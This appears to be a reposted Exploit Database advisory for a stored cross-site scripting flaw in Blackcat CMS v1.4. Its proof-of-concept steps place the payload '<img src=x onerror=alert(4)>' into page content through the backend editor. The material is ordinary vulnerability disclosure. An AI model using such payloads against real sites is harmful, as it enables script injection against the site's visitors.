Blackcat Cms v1.4 – Stored XSS

• Exploit Database
• 17 阅读

• 作者： Mirabbas Ağalarov
  日期： 2023-07-19
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/51604/

• Exploit Title: Blackcat Cms v1.4 - Stored XSS
  Application: blackcat Cms
  Version: v1.4
  Bugs:Stored XSS
  Technology: PHP
  Vendor URL: https://blackcat-cms.org/
  Software Link: https://github.com/BlackCatDevelopment/BlackCatCMS
  Date of found: 13.07.2023
  Author: Mirabbas Ağalarov
  Tested on: Linux 
  
  
  2. Technical Details & POC
  ========================================
  steps: 
  
  1. login to account
  2. go to pages (http://localhost/BlackCatCMS-1.4/upload/backend/pages/modify.php?page_id=1)
  3. set as <img src=x onerror=alert(4)>
  4. Visit http://localhost/BlackCatCMS-1.4/upload/page/welcome.php?preview=1